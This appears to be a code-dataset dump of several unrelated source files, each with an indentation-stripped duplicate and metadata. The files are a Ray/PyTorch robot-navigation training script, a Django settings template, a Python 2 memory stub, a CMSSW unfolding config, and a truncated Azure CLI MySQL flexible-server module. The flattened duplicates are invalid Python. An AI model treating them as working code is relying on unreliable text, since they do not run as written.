# the project modules Robot / Environment / Networks / Train / Task.
import Robot
import Environment
from Networks import *
import Train
import Task
import ray
import warnings
import torch as pt
# NOTE(review): `pt` is not referenced below — presumably imported for its
# side effects or for interactive use; TODO confirm before removing.
# Learning Parameters **************************************************************************************************
num_epochs = 3000
max_m_dim = 300 # at the memory layer
batch_size = 250
input_dim = 1 # actions
output_dim = 17*4 + 1 # observations (RGB-D array size 17 + prev action)
horizon = 80
lr = 1e-4
rnn_horizon = 1 # = horizon if time-varying
reg = 0
load = False
load_file = None # for loading checkpoint models
seed = 42
print_int = 50
ckpt_int = 100
# Simulation Parameters ************************************************************************************************
params = {}
params['time_step'] = 0.1 # seconds
params['husky_velocity'] = 2 # meters per second
# ENVIRONMENT INFORMATION
params['y_max']= 10
params['y_min']= 0
params['x_min']= -5
params['x_max']= 5.5
params['filename'] = 'model_trial'
params['mode'] = 'train'
# 'test1': test with colors seen in training; 'test2': swapped colors'; 'test3': new set of colors
# Train ****************************************************************************************************************
warnings.filterwarnings("ignore", category=UserWarning)
robot = Robot.Husky(forward_speed=params['husky_velocity'], dt=params['time_step'])
task = Task.GoalNav(goal=[3.0, 9.0], alpha=0.)
env = Environment.RandomObstacle(robot, parallel=True, gui=False, y_max=params['y_max'], y_min=params['y_min'],
                                 x_min=params['x_min'], x_max=params['x_max'], task=task, mode=params['mode'],
                                 filename=params['filename'])
# RNN comes from the star import of Networks above.
net = RNN(output_dim, max_m_dim, input_dim, rnn_horizon, seed=seed)
try:
    ray.init()
    Train.train_AMR_one(env, net, num_epochs, rnn_horizon, horizon, max_m_dim, batch_size, task, lr, reg,
                        minibatch_size=0, opt_iters=1, multiprocess=True, load=load, filename=load_file, seed=seed,
                        print_int=print_int, ckpt_int=ckpt_int)
except KeyboardInterrupt:
    # Let Ctrl-C shut ray down instead of leaving workers behind.
    ray.shutdown()
|
import Robot
import Environment
from Networks import *
import Train
import Task
import ray
import warnings
import torch as pt
# Learning Parameters **************************************************************************************************
num_epochs = 3000
max_m_dim = 300 # at the memory layer
batch_size = 250
input_dim = 1 # actions
output_dim = 17*4 + 1 # observations (RGB-D array size 17 + prev action)
horizon = 80
lr = 1e-4
rnn_horizon = 1 # = horizon if time-varying
reg = 0
load = False
load_file = None # for loading checkpoint models
seed = 42
print_int = 50
ckpt_int = 100
# Simulation Parameters ************************************************************************************************
params = {}
params['time_step'] = 0.1 # seconds
params['husky_velocity'] = 2 # meters per second
# ENVIRONMENT INFORMATION
params['y_max']= 10
params['y_min']= 0
params['x_min']= -5
params['x_max']= 5.5
params['filename'] = 'model_trial'
params['mode'] = 'train'
# 'test1': test with colors seen in training; 'test2': swapped colors'; 'test3': new set of colors
# Train ****************************************************************************************************************
warnings.filterwarnings("ignore", category=UserWarning)
robot = Robot.Husky(forward_speed=params['husky_velocity'], dt=params['time_step'])
task = Task.GoalNav(goal=[3.0, 9.0], alpha=0.)
env = Environment.RandomObstacle(robot, parallel=True, gui=False, y_max=params['y_max'], y_min=params['y_min'],
x_min=params['x_min'], x_max=params['x_max'], task=task, mode=params['mode'],
filename=params['filename'])
net = RNN(output_dim, max_m_dim, input_dim, rnn_horizon, seed=seed)
try:
ray.init()
Train.train_AMR_one(env, net, num_epochs, rnn_horizon, horizon, max_m_dim, batch_size, task, lr, reg,
minibatch_size=0, opt_iters=1, multiprocess=True, load=load, filename=load_file, seed=seed,
print_int=print_int, ckpt_int=ckpt_int)
except KeyboardInterrupt:
ray.shutdown()
|
en
| 0.388389
|
# Learning Parameters ************************************************************************************************** # at the memory layer # actions # observations (RGB-D array size 17 + prev action) # = horizon if time-varying # for loading checkpoint models # Simulation Parameters ************************************************************************************************ # seconds # meters per second # ENVIRONMENT INFORMATION # 'test1': test with colors seen in training; 'test2': swapped colors'; 'test3': new set of colors # Train ****************************************************************************************************************
| 2.263967
| 2
|
ngnotifier/example.settings.py
|
Dubrzr/NG-Notifier
| 14
|
6628120
|
<filename>ngnotifier/example.settings.py
"""
Django settings for ng-notifier project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
"""
import os
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
from django.utils.translation import ugettext_lazy as _
# SITE PARAMETERS
SITE_NAME = "NG Notifier"
DOMAIN = 'http://localhost/' # Must end with a slash! /!\
SITE_URL_PREFIX = '' # Empty or your-prefix/ <- Must end with a slash /!\
SITE_URL = DOMAIN + SITE_URL_PREFIX
SECRET_KEY = ''
API_KEY = '' # Define it if you want to connect with android!
DEBUG = False
TEMPLATE_DEBUG = False
LOGIN_REDIRECT_URL = '/settings'
# DIRECTORIES
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
APP_DIR = os.path.dirname(BASE_DIR)
LOCALE_PATHS = (os.path.join(BASE_DIR, "web", "locale"),)
TEMPLATE_DIRS = (BASE_DIR + '/templates',)
STATIC_ROOT = APP_DIR + '/static/'
STATICFILES_DIRS = (APP_DIR + '/web/static/',)
ALLOWED_HOSTS = ['localhost', '127.0.0.1']
AUTH_USER_MODEL = 'ngnotifier.User'
PASSWORD_HASHERS = ('django.contrib.auth.hashers.PBKDF2PasswordHasher',)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ngnotifier',
'captcha',
'apscheduler',
'rest_framework',
'push_notifications',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
ROOT_URLCONF = 'ngnotifier.urls'
WSGI_APPLICATION = 'ngnotifier.wsgi.application'
X_FRAME_OPTIONS = 'DENY'
# DATABASE
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
},
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': '',
# 'USER': '',
# 'PASSWORD': '',
# 'HOST': 'localhost',
# 'PORT': 5432
# }
}
# I18N
LANGUAGE_CODE = 'en-en'
TIME_ZONE = 'Europe/Paris'
LANGUAGES = (
('en', _('English')),
)
USE_I18N = False
USE_L10N = True
USE_TZ = False
# STATICS
STATIC_URL = '/' + SITE_URL_PREFIX + 'static/'
# CONTEXT PROCESSORS -> adds some 'global' variables for templates
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
'ngnotifier.context_processors.site_infos'
)
# **** NOTIFS CONFIG **** #
# Tag to be added to the message object
BOT_TAG = '[BOT]' # Example: News title here [BOT]
# Message to be displayed at the end of the news.
BOT_MSG = '\nThis message has been sent automatically by the *NG NOTIFIER BOT*.'
SEND_FROM_POSTER = False # Send the mail from the address of the news poster
FROM_ADDR = '<EMAIL>'
mail_conf = {
'address': '',
'host': '',
'port': 0,
'user': '',
'pass': '',
'ssl': True
}
PUSH_NOTIFICATIONS_SETTINGS = {
'GCM_API_KEY': '<your api key>', # Google GCM
'APNS_CERTIFICATE': '/path/to/your/certificate.pem', # Apple APNS
'APNS_CERTIFICATE_DEV': '/path/to/yout/certicate_dev.pem',
'APNS_CERTIFICATE_PASSWORD': None,
'APNS_TOPIC': 'org.mygroup.myapp'
}
# **** CELERY CONFIG **** #
SECONDS_DELTA_NEWS = 60 # Time delta between two checks for new news
SECONDS_DELTA_GROUP = 24*60*60 # Time delta between two checks for new groups
# **** HOSTS CONFIG **** #
hosts = {
'news.epita.fr':
{
'host': 'news.epita.fr',
'port': 119,
'user': None,
'pass': None,
'ssl': False,
'encoding': 'utf-8',
'timeout': 30,
'groups': [], # Empty means get all groups
},
}
users = {} # {
# 'Me':
# {
# 'mail': '<EMAIL>',
# 'password': '',
# 'admin': False,
# 'notifs': {
# 'pushbullet': True,
# 'mail': True
# },
# 'pushbullet_api_key': 'somethingherethatisabase64md5',
# 'subscriptions': [
# ]
# },
# }
|
<filename>ngnotifier/example.settings.py
"""
Django settings for ng-notifier project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
"""
import os
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
from django.utils.translation import ugettext_lazy as _
# SITE PARAMETERS
SITE_NAME = "NG Notifier"
DOMAIN = 'http://localhost/' # Must end with a slash! /!\
SITE_URL_PREFIX = '' # Empty or your-prefix/ <- Must end with a slash /!\
SITE_URL = DOMAIN + SITE_URL_PREFIX
SECRET_KEY = ''
API_KEY = '' # Define it if you want to connect with android!
DEBUG = False
TEMPLATE_DEBUG = False
LOGIN_REDIRECT_URL = '/settings'
# DIRECTORIES
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
APP_DIR = os.path.dirname(BASE_DIR)
LOCALE_PATHS = (os.path.join(BASE_DIR, "web", "locale"),)
TEMPLATE_DIRS = (BASE_DIR + '/templates',)
STATIC_ROOT = APP_DIR + '/static/'
STATICFILES_DIRS = (APP_DIR + '/web/static/',)
ALLOWED_HOSTS = ['localhost', '127.0.0.1']
AUTH_USER_MODEL = 'ngnotifier.User'
PASSWORD_HASHERS = ('django.contrib.auth.hashers.PBKDF2PasswordHasher',)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ngnotifier',
'captcha',
'apscheduler',
'rest_framework',
'push_notifications',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
ROOT_URLCONF = 'ngnotifier.urls'
WSGI_APPLICATION = 'ngnotifier.wsgi.application'
X_FRAME_OPTIONS = 'DENY'
# DATABASE
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
},
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': '',
# 'USER': '',
# 'PASSWORD': '',
# 'HOST': 'localhost',
# 'PORT': 5432
# }
}
# I18N
LANGUAGE_CODE = 'en-en'
TIME_ZONE = 'Europe/Paris'
LANGUAGES = (
('en', _('English')),
)
USE_I18N = False
USE_L10N = True
USE_TZ = False
# STATICS
STATIC_URL = '/' + SITE_URL_PREFIX + 'static/'
# CONTEXT PROCESSORS -> adds some 'global' variables for templates
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
'ngnotifier.context_processors.site_infos'
)
# **** NOTIFS CONFIG **** #
# Tag to be added to the message object
BOT_TAG = '[BOT]' # Example: News title here [BOT]
# Message to be displayed at the end of the news.
BOT_MSG = '\nThis message has been sent automatically by the *NG NOTIFIER BOT*.'
SEND_FROM_POSTER = False # Send the mail from the address of the news poster
FROM_ADDR = '<EMAIL>'
mail_conf = {
'address': '',
'host': '',
'port': 0,
'user': '',
'pass': '',
'ssl': True
}
PUSH_NOTIFICATIONS_SETTINGS = {
'GCM_API_KEY': '<your api key>', # Google GCM
'APNS_CERTIFICATE': '/path/to/your/certificate.pem', # Apple APNS
'APNS_CERTIFICATE_DEV': '/path/to/yout/certicate_dev.pem',
'APNS_CERTIFICATE_PASSWORD': None,
'APNS_TOPIC': 'org.mygroup.myapp'
}
# **** CELERY CONFIG **** #
SECONDS_DELTA_NEWS = 60 # Time delta between two checks for new news
SECONDS_DELTA_GROUP = 24*60*60 # Time delta between two checks for new groups
# **** HOSTS CONFIG **** #
hosts = {
'news.epita.fr':
{
'host': 'news.epita.fr',
'port': 119,
'user': None,
'pass': None,
'ssl': False,
'encoding': 'utf-8',
'timeout': 30,
'groups': [], # Empty means get all groups
},
}
users = {} # {
# 'Me':
# {
# 'mail': '<EMAIL>',
# 'password': '',
# 'admin': False,
# 'notifs': {
# 'pushbullet': True,
# 'mail': True
# },
# 'pushbullet_api_key': 'somethingherethatisabase64md5',
# 'subscriptions': [
# ]
# },
# }
|
en
| 0.527066
|
Django settings for ng-notifier project. For more information on this file, see https://docs.djangoproject.com/en/1.7/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.7/ref/settings/ # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/ # SITE PARAMETERS # Must end with a slash! /!\ # Empty or your-prefix/ <- Must end with a slash /!\ # Define it if you want to connect with android! # DIRECTORIES # DATABASE # 'default': { # 'ENGINE': 'django.db.backends.postgresql_psycopg2', # 'NAME': '', # 'USER': '', # 'PASSWORD': '', # 'HOST': 'localhost', # 'PORT': 5432 # } # I18N # STATICS # CONTEXT PROCESSORS -> adds some 'global' variables for templates # **** NOTIFS CONFIG **** # # Tag to be added to the message object # Example: News title here [BOT] # Message to be displayed at the end of the news. # Send the mail from the address of the news poster # Google GCM # Apple APNS # **** CELERY CONFIG **** # # Time delta between two checks for new news # Time delta between two checks for new groups # **** HOSTS CONFIG **** # # Empty means get all groups # { # 'Me': # { # 'mail': '<EMAIL>', # 'password': '', # 'admin': False, # 'notifs': { # 'pushbullet': True, # 'mail': True # }, # 'pushbullet_api_key': 'somethingherethatisabase64md5', # 'subscriptions': [ # ] # }, # }
| 1.790553
| 2
|
py64/memory.py
|
jesseward/py64
| 5
|
6628121
|
<reponame>jesseward/py64
#!/usr/bin/env python2
# I, <NAME>, hereby place this file into the public domain.
class Memory(object):
    """Base class for memory regions.

    Only tracks writability; concrete read/write behaviour is left to
    subclasses, which are expected to provide:
        read_memory(self, address, size=1) -> value
        write_memory(self, address, value, size) -> None
    """

    def __init__(self):
        # Set per instance rather than as a class attribute because of
        # ShedSkin's type inference, per the original author's note.
        self.B_can_write = True
|
#!/usr/bin/env python2
# I, <NAME>, hereby place this file into the public domain.
class Memory(object):
def __init__(self):
self.B_can_write = True # in the instance because of ShedSkin
# def read_memory(self, address, size = 1):
# return 0xFF
#
# def write_memory(self, address, value, size):
# pass
|
en
| 0.718702
|
#!/usr/bin/env python2 # I, <NAME>, hereby place this file into the public domain. # in the instance because of ShedSkin # def read_memory(self, address, size = 1): # return 0xFF # # def write_memory(self, address, value, size): # pass
| 2.711086
| 3
|
python/UnfoldingProducer_cfi.py
|
jjacob/NTupleProduction
| 1
|
6628122
|
# CMSSW configuration fragment declaring the UnfoldingProducer modules.
import FWCore.ParameterSet.Config as cms
# Electron-channel producer: wires event-weight, generator- and
# reconstruction-level collections plus selection flags into the
# "UnfoldingProducer" plugin. Input tags name products made by other modules.
unfoldingProducerElectron = cms.EDProducer("UnfoldingProducer",
    pu_weight_input=cms.InputTag('eventWeightPU'),
    b_tag_weight_input=cms.InputTag('eventWeightBtag'),
    storePDFWeights=cms.bool(True),
    PDFWeightsInputTag=cms.InputTag('pdfWeights','cteq66'),
    leptonWeightsInputTag=cms.InputTag('eventWeightMuons'),
    gen_part_input=cms.InputTag('genParticles'),
    gen_MET_input=cms.InputTag('genMetTrue'),
    reco_MET_Input=cms.InputTag('patType1CorrectedPFMet'),
    gen_jet_input=cms.InputTag('ak5GenJetsNoNu'),
    reco_jet_input=cms.InputTag('selectedPatJetsPFlow'),
    electron_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.signalElectron', 'PAT'),
    muon_input=cms.InputTag("topPairMuPlusJetsSelection", 'TopPairMuonPlusJetsSelection.signalMuon', 'PAT'),
    electronIndex_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.signalElectronIndex', 'PAT'),
    muonIndex_input=cms.InputTag("topPairMuPlusJetsSelection", 'TopPairMuonPlusJetsSelection.signalMuonIndex', 'PAT'),
    vertex_input=cms.InputTag('goodOfflinePrimaryVertices'),
    gen_event_input=cms.InputTag('genEvt'),
    selection_flag_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.FullSelection', 'PAT'),
    is_semileptonic_electron_flag=cms.InputTag('ttSemiLeptonicElectronFilter'),
    is_semileptonic_muon_flag=cms.InputTag('ttSemiLeptonicMuonFilter'),
    do_electron_channel=cms.untracked.bool(True),
    Prefix = cms.string('unfolding.'),
    Suffix = cms.string(''),
)
# Muon-channel variant: identical configuration apart from the channel switch.
unfoldingProducerMuon = unfoldingProducerElectron.clone(
    do_electron_channel=cms.untracked.bool(False),
)
|
import FWCore.ParameterSet.Config as cms
unfoldingProducerElectron = cms.EDProducer("UnfoldingProducer",
pu_weight_input=cms.InputTag('eventWeightPU'),
b_tag_weight_input=cms.InputTag('eventWeightBtag'),
storePDFWeights=cms.bool(True),
PDFWeightsInputTag=cms.InputTag('pdfWeights','cteq66'),
leptonWeightsInputTag=cms.InputTag('eventWeightMuons'),
gen_part_input=cms.InputTag('genParticles'),
gen_MET_input=cms.InputTag('genMetTrue'),
reco_MET_Input=cms.InputTag('patType1CorrectedPFMet'),
gen_jet_input=cms.InputTag('ak5GenJetsNoNu'),
reco_jet_input=cms.InputTag('selectedPatJetsPFlow'),
electron_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.signalElectron', 'PAT'),
muon_input=cms.InputTag("topPairMuPlusJetsSelection", 'TopPairMuonPlusJetsSelection.signalMuon', 'PAT'),
electronIndex_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.signalElectronIndex', 'PAT'),
muonIndex_input=cms.InputTag("topPairMuPlusJetsSelection", 'TopPairMuonPlusJetsSelection.signalMuonIndex', 'PAT'),
vertex_input=cms.InputTag('goodOfflinePrimaryVertices'),
gen_event_input=cms.InputTag('genEvt'),
selection_flag_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.FullSelection', 'PAT'),
is_semileptonic_electron_flag=cms.InputTag('ttSemiLeptonicElectronFilter'),
is_semileptonic_muon_flag=cms.InputTag('ttSemiLeptonicMuonFilter'),
do_electron_channel=cms.untracked.bool(True),
Prefix = cms.string('unfolding.'),
Suffix = cms.string(''),
)
unfoldingProducerMuon = unfoldingProducerElectron.clone(
do_electron_channel=cms.untracked.bool(False),
)
|
none
| 1
| 1.294216
| 1
|
|
src/azure-cli/azure/cli/command_modules/rdbms/flexible_server_custom_mysql.py
|
rheaparekh/azure-cli
| 1
|
6628123
|
<filename>src/azure-cli/azure/cli/command_modules/rdbms/flexible_server_custom_mysql.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=unused-argument, line-too-long
import datetime as dt
from datetime import datetime
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import resource_id, is_valid_resource_id, parse_resource_id # pylint: disable=import-error
from knack.log import get_logger
from azure.core.exceptions import ResourceNotFoundError
from azure.cli.core.azclierror import RequiredArgumentMissingError
from azure.cli.core.commands.client_factory import get_subscription_id
from azure.cli.core.util import CLIError, sdk_no_wait
from azure.cli.core.local_context import ALL
from azure.mgmt.rdbms import mysql_flexibleservers
from ._client_factory import get_mysql_flexible_management_client, cf_mysql_flexible_firewall_rules, \
cf_mysql_flexible_db
from ._flexible_server_util import resolve_poller, generate_missing_parameters, create_firewall_rule, \
parse_public_access_input, generate_password, parse_maintenance_window, get_mysql_list_skus_info, \
DEFAULT_LOCATION_MySQL
from .flexible_server_custom_common import user_confirmation
from .flexible_server_virtual_network import create_vnet, prepare_vnet
from .validators import mysql_arguments_validator
logger = get_logger(__name__)
DEFAULT_DB_NAME = 'flexibleserverdb'
DELEGATION_SERVICE_NAME = "Microsoft.DBforMySQL/flexibleServers"
# region create without args
# pylint: disable=too-many-locals, too-many-statements
def flexible_server_create(cmd, client, resource_group_name=None, server_name=None, sku_name=None, tier=None,
                           location=None, storage_mb=None, administrator_login=None,
                           administrator_login_password=None, version=None,
                           backup_retention=None, tags=None, public_access=None, database_name=None,
                           subnet_arm_resource_id=None, high_availability=None, zone=None, assign_identity=False,
                           vnet_resource_id=None, vnet_address_prefix=None, subnet_address_prefix=None, iops=None):
    """Create a MySQL flexible server together with its network, firewall rule
    and default database.

    Missing parameters (location, resource group, server name, password) are
    generated; networking is derived from the --subnet/--vnet/--public-access
    combination. Returns the summary dict built by _form_response.
    Raises CLIError on invalid parameter combinations.

    BUGFIX: the two ``<PASSWORD>`` placeholders (an anonymization artifact
    that made this function a syntax error) are restored to the original
    ``None`` default and ``generate_password`` call — that helper is imported
    above and otherwise unused.
    """
    # validator
    if location is None:
        location = DEFAULT_LOCATION_MySQL
    sku_info, iops_info = get_mysql_list_skus_info(cmd, location)
    mysql_arguments_validator(tier, sku_name, storage_mb, backup_retention, sku_info, version=version)
    db_context = DbContext(
        azure_sdk=mysql_flexibleservers, cf_firewall=cf_mysql_flexible_firewall_rules, cf_db=cf_mysql_flexible_db,
        logging_name='MySQL', command_group='mysql', server_client=client)
    # Raise error when user passes values for both parameters
    if subnet_arm_resource_id is not None and public_access is not None:
        raise CLIError("Incorrect usage : A combination of the parameters --subnet "
                       "and --public_access is invalid. Use either one of them.")
    # When address space parameters are passed, the only valid combination is : --vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix
    # pylint: disable=too-many-boolean-expressions
    if (vnet_address_prefix is not None) or (subnet_address_prefix is not None):
        if (((vnet_address_prefix is not None) and (subnet_address_prefix is None)) or
                ((vnet_address_prefix is None) and (subnet_address_prefix is not None)) or
                ((vnet_address_prefix is not None) and (subnet_address_prefix is not None) and
                 ((vnet_resource_id is None) or (subnet_arm_resource_id is None)))):
            raise CLIError("Incorrect usage : "
                           "--vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix must be supplied together.")
    server_result = firewall_id = subnet_id = None
    # Populate desired parameters
    location, resource_group_name, server_name = generate_missing_parameters(cmd, location, resource_group_name,
                                                                             server_name, 'mysql')
    server_name = server_name.lower()
    # Handle Vnet scenario
    if (subnet_arm_resource_id is not None) or (vnet_resource_id is not None):
        subnet_id = prepare_vnet(cmd, server_name, vnet_resource_id, subnet_arm_resource_id, resource_group_name,
                                 location, DELEGATION_SERVICE_NAME, vnet_address_prefix, subnet_address_prefix)
        delegated_subnet_arguments = mysql_flexibleservers.models.DelegatedSubnetArguments(
            subnet_arm_resource_id=subnet_id)
    elif public_access is None and subnet_arm_resource_id is None and vnet_resource_id is None:
        # No networking options at all: create a fresh vnet for the server.
        subnet_id = create_vnet(cmd, server_name, location, resource_group_name,
                                DELEGATION_SERVICE_NAME)
        delegated_subnet_arguments = mysql_flexibleservers.models.DelegatedSubnetArguments(
            subnet_arm_resource_id=subnet_id)
    else:
        delegated_subnet_arguments = None
    # calculate IOPS
    iops = _determine_iops(storage_mb, iops_info, iops, tier, sku_name)
    storage_mb *= 1024  # storage input comes in GiB value
    # Generate a random password when the user did not supply one.
    administrator_login_password = generate_password(administrator_login_password)
    if server_result is None:
        # Create mysql server
        # Note : passing public_access has no effect as the accepted values are 'Enabled' and 'Disabled'. So the value ends up being ignored.
        server_result = _create_server(db_context, cmd, resource_group_name, server_name, location,
                                       backup_retention,
                                       sku_name, tier, storage_mb, administrator_login,
                                       administrator_login_password,
                                       version, tags, delegated_subnet_arguments, assign_identity, public_access,
                                       high_availability, zone, iops)
    # Adding firewall rule
    if public_access is not None and str(public_access).lower() != 'none':
        if str(public_access).lower() == 'all':
            start_ip, end_ip = '0.0.0.0', '255.255.255.255'
        else:
            start_ip, end_ip = parse_public_access_input(public_access)
        firewall_id = create_firewall_rule(db_context, cmd, resource_group_name, server_name, start_ip, end_ip)
    # Create mysql database if it does not exist
    if database_name is None:
        database_name = DEFAULT_DB_NAME
    _create_database(db_context, cmd, resource_group_name, server_name, database_name)
    user = server_result.administrator_login
    server_id = server_result.id
    loc = server_result.location
    version = server_result.version
    sku = server_result.sku.name
    host = server_result.fully_qualified_domain_name
    logger.warning('Make a note of your password. If you forget, you would have to reset your password with'
                   '\'az mysql flexible-server update -n %s -g %s -p <new-password>\'.',
                   server_name, resource_group_name)
    _update_local_contexts(cmd, server_name, resource_group_name, location, user)
    return _form_response(user, sku, loc, server_id, host, version,
                          administrator_login_password if administrator_login_password is not None else '*****',
                          _create_mysql_connection_string(host, database_name, user, administrator_login_password),
                          database_name, firewall_id, subnet_id)
def flexible_server_restore(cmd, client, resource_group_name, server_name, source_server, restore_point_in_time, location=None, no_wait=False):
    """Restore a new flexible server from *source_server* at *restore_point_in_time*.

    The restored server is always placed in the source server's location: the
    *location* argument is overwritten once the source server is resolved.
    Raises ValueError for an invalid source id or an unreachable source server.
    """
    provider = 'Microsoft.DBforMySQL'
    # Accept either a full ARM resource id or a bare server name for the source.
    if not is_valid_resource_id(source_server):
        if len(source_server.split('/')) == 1:
            source_server = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace=provider,
                type='flexibleServers',
                name=source_server)
        else:
            raise ValueError('The provided source-server {} is invalid.'.format(source_server))
    # The timestamp may arrive with or without fractional seconds; try both formats.
    try:
        restore_point_in_time = datetime.strptime(restore_point_in_time, "%Y-%m-%dT%H:%M:%S.%f+00:00")
    except ValueError:
        restore_point_in_time = datetime.strptime(restore_point_in_time, "%Y-%m-%dT%H:%M:%S+00:00")
    restore_point_in_time = restore_point_in_time.replace(tzinfo=dt.timezone.utc)
    parameters = mysql_flexibleservers.models.Server(
        source_server_id=source_server,
        restore_point_in_time=restore_point_in_time,
        location=location,
        create_mode="PointInTimeRestore"
    )
    # Retrieve location from same location as source server
    id_parts = parse_resource_id(source_server)
    try:
        source_server_object = client.get(id_parts['resource_group'], id_parts['name'])
        parameters.location = source_server_object.location
    except Exception as e:
        # Chain the SDK error so the root cause is preserved for debugging.
        raise ValueError('Unable to get source server: {}.'.format(str(e))) from e
    return sdk_no_wait(no_wait, client.begin_create, resource_group_name, server_name, parameters)
# pylint: disable=too-many-branches
def flexible_server_update_custom_func(cmd, instance,
                                       sku_name=None,
                                       tier=None,
                                       storage_mb=None,
                                       backup_retention=None,
                                       administrator_login_password=None,
                                       ssl_enforcement=None,
                                       subnet_arm_resource_id=None,
                                       tags=None,
                                       auto_grow=None,
                                       assign_identity=False,
                                       ha_enabled=None,
                                       replication_role=None,
                                       maintenance_window=None,
                                       iops=None):
    """Mutate *instance* with the requested changes and return a ServerForUpdate payload.

    When --maintenance-window is supplied, only the maintenance window is
    updated and every other argument is ignored for that call (early return).
    """
    # validator
    location = ''.join(instance.location.lower().split())
    sku_info, iops_info = get_mysql_list_skus_info(cmd, location)
    mysql_arguments_validator(tier, sku_name, storage_mb, backup_retention, sku_info, instance=instance)
    from importlib import import_module
    server_module_path = instance.__module__
    module = import_module(server_module_path)  # replacement not needed for update in flex servers
    ServerForUpdate = getattr(module, 'ServerForUpdate')
    if storage_mb:
        instance.storage_profile.storage_mb = storage_mb * 1024  # input is GiB; the API takes MB
    # Relative SKU ordering, used to tell an upgrade from a downgrade when IOPS are recomputed.
    sku_rank = {'Standard_B1s': 1, 'Standard_B1ms': 2, 'Standard_B2s': 3, 'Standard_D2ds_v4': 4,
                'Standard_D4ds_v4': 5, 'Standard_D8ds_v4': 6,
                'Standard_D16ds_v4': 7, 'Standard_D32ds_v4': 8, 'Standard_D48ds_v4': 9, 'Standard_D64ds_v4': 10,
                'Standard_E2ds_v4': 11,
                'Standard_E4ds_v4': 12, 'Standard_E8ds_v4': 13, 'Standard_E16ds_v4': 14, 'Standard_E32ds_v4': 15,
                'Standard_E48ds_v4': 16,
                'Standard_E64ds_v4': 17}
    if location == 'eastus2euap':
        # Canary region additionally exposes the v3 SKUs at the same ranks.
        sku_rank.update({
            'Standard_D2s_v3': 4,
            'Standard_D4s_v3': 5, 'Standard_D8s_v3': 6,
            'Standard_D16s_v3': 7, 'Standard_D32s_v3': 8, 'Standard_D48s_v3': 9, 'Standard_D64s_v3': 10,
            'Standard_E2s_v3': 11,
            'Standard_E4s_v3': 12, 'Standard_E8s_v3': 13, 'Standard_E16s_v3': 14, 'Standard_E32s_v3': 15,
            'Standard_E48s_v3': 16,
            'Standard_E64s_v3': 17
        })
    if iops:
        if (tier is not None and sku_name is None) or (tier is None and sku_name is not None):
            raise CLIError('Argument Error. If you pass --tier, --sku_name is a mandatory parameter and vice-versa.')
        if tier is None and sku_name is None:
            # SKU unchanged: just clamp the requested IOPS against the current SKU.
            iops = _determine_iops(instance.storage_profile.storage_mb // 1024, iops_info, iops, instance.sku.tier, instance.sku.name)
        else:
            new_sku_rank = sku_rank[sku_name]
            old_sku_rank = sku_rank[instance.sku.name]
            supplied_iops = iops
